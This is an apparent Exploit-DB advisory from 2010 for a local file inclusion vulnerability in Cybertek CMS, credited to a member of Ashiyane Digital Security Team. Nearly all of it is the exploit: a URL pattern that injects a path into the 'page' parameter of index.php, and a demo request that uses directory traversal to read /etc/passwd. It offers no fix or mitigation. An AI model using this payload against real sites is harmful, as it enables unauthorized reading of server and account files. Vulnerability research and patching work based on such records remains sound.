Cybertek CMS - Local File Inclusion

EDB-ID:

12619

CVE:

N/A

Author:

XroGuE

Type:

webapps

Platform:

PHP

Published:

2010-05-16

=======================================================
Cybertek CMS Local File Include Vulnerability
=======================================================
########################################
# Name: Cybertek CMS Local File Include Vulnerability
# Vendor: www.cybertek.co.za
# Date: 2010/05/16
# Author: Ashiyane Digital Security Team
# Discovered: XroGuE
# Thanks to: Virangar,Ali.Eagle,Satanic2000,Ashiyane Members
# Contact: Xrogue_p3rsi4n_hack3r@Hotmail.com
########################################

########################################
[+] Vulnerability:

[+] Exploit: www.Site.com/[path]/index.php?page=[LFI]

[+] Demo: http://server/index.php?page=../../../../../../../../../../../etc/passwd


[+] Done ... ! :))

########################################